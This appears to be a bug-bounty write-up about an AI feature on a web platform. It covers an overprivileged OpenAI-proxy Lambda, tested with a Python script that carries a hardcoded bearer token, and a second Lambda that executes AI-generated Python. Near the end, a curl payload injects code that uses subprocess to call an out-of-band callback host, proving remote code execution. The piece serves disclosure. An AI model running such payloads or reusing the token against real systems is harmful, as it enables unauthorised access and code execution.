Overprivileged API and Remote Code Execution (RCE)

22 hours ago 12
BOOK THIS SPACE FOR AD
ARTICLE AD

Discovery Process

Since I had previously discovered vulnerabilities in this platform, I was already familiar with its functionality. When I noticed the option to integrate AI, I knew that would be my next focus.

I started by testing the AI interactions. After sending a message, I inspected the request in the network tab (real ones use the network tab instead of Burp Suite). I quickly realized that the platform was using OpenAI’s ChatGPT API. However, the requests were being sent to an unexpected URL:

https://xwk……lambda-url.us-east-1.on.aws/

A few oddities stood out immediately:

Instead of sending requests to https://api.openai.com, the platform was using a Lambda function as a proxy middleware.A new bearer token was generated each time a user logged in to make requests to the AI. Initially, I suspected an API key leak, but the token didn’t work with standard OpenAI API endpoints — only with this specific Lambda server.The API endpoints mirrored OpenAI’s but lacked the /v1 prefix. For example, requests were sent to chat/completions instead of /v1/chat/completions.
I did NOT ask for all that

Given what I had observed, I decided to test the API directly. Since the endpoint names were identical to OpenAI’s, I automated my tests using Python.

I wrote a script to interact with the API and test various functionalities:

import openai
import requests

API_KEY = "44da8e2934a2ddb20bf7020c16c33743" # change this

headers = {
"Authorization": f"Bearer {API_KEY}",
"Content-Type": "application/json"
}

BASE_URL = "https://xwk...........lambda-url.us-east-1.on.aws"

# 1. Test Completions API
completion_data = {
"model": "gpt-3.5-turbo-instruct",
"prompt": "Tell me a joke.",
"max_tokens": 50
}
completion_response = requests.post(f"{BASE_URL}/completions", headers=headers, json=completion_data)

# 2. Test Chat Completions API (GPT-4)
chat_data = {
"model": "gpt-4",
"messages": [{"role": "system", "content": "This is a test messsage."},
{"role": "user", "content": "What is the capital of France?"}]
}
chat_response = requests.post(f"{BASE_URL}/chat/completions", headers=headers, json=chat_data)

# 3. Test Embeddings API
embedding_data = {
"model": "text-embedding-ada-002",
"input": "It Works!"
}
embedding_response = requests.post(f"{BASE_URL}/embeddings", headers=headers, json=embedding_data)

# 4. Test Image Generation (DALL·E)
image_data = {
"model": "dall-e-2",
"prompt": "A futuristic city with flying cars",
"n": 1,
"size": "1024x1024"
}
image_response = requests.post(f"{BASE_URL}/images/generations", headers=headers, json=image_data)

# 5. Test Moderation API
moderation_data = {
"input": "I want to harm someone."
}
moderation_response = requests.post(f"{BASE_URL}/moderations", headers=headers, json=moderation_data)

# 6. Test Speech-to-Text (Whisper) [Requires Audio File]
audio_file_path = "test_audio.mp3"
try:
with open(audio_file_path, "rb") as audio_file:
audio_response = requests.post(
f"{BASE_URL}/audio/transcriptions",
headers={"Authorization": f"Bearer {API_KEY}"},
files={"file": audio_file},
data={"model": "whisper-1"}
)
except FileNotFoundError:
audio_response = {"error": "No test audio file found"}

# Print Results
print("Completions Response:", completion_response.json())
print("Chat Completions Response:", chat_response.json())
print("Embeddings Response:", embedding_response.json())
print("Image Generation Response:", image_response.json())
print("Moderation Response:", moderation_response.json())
print("Audio Transcription Response:", audio_response.json() if isinstance(audio_response, requests.Response) else audio_response)API_KEY = "<REDACTED>"

Results

All API requests were successful, confirming that the integration allowed access to functionalities beyond what a normal user should have.

Image generated by AI

At this point, I attempted to escalate privileges further by testing for write permissions but unfortunately, I did not have them.

Next, I moved on to testing the mobile app since the same functions were being used there as well, intercepting requests with HTTP Toolkit. I revisited the AI integration and repeatedly prompted the AI with variations of “generate a picture of a futuristic car.”

Unexpectedly, instead of returning an image, the AI generated a graph that resembled a car. Graphs, i believe were normally generated to Visualize patient data, so it ended up plotting the car on a graph.

Graph generated by AI

Because I was intercepting requests, I saw that this request was sent to a completely different Lambda function:

https://rbb……lambda-url.us-east-1.on.aws/

graph request in HTTPtoolkit

At this point, it became clear that the AI was generating code to run and passing it to this server for execution. Given that it was a Python-based execution environment, direct system command execution wouldn’t work. Instead, I tested whether I could import libraries and make external requests.

I crafted a payload to test remote code execution:

curl -X POST "https://rbb……lambda-url.us-east-1.on.aws/" \
-H "Accept: */*" \
-H "Authorization: Bearer <REDACTED>" \
-H "Content-Type: application/json" \
--data-raw '{
"code": "import subprocess; subprocess.call([\"curl\", \"-X\", \"GET\", \"edv3rz3d44ofsnu1y.oastify.com\"])"
}'

Results

This triggered a ping on my server, confirming that Remote Code Execution (RCE) was possible.

ping on my server

I stopped testing after this confirmation, as further exploitation was unnecessary to prove the severity of the issue.

Read Entire Article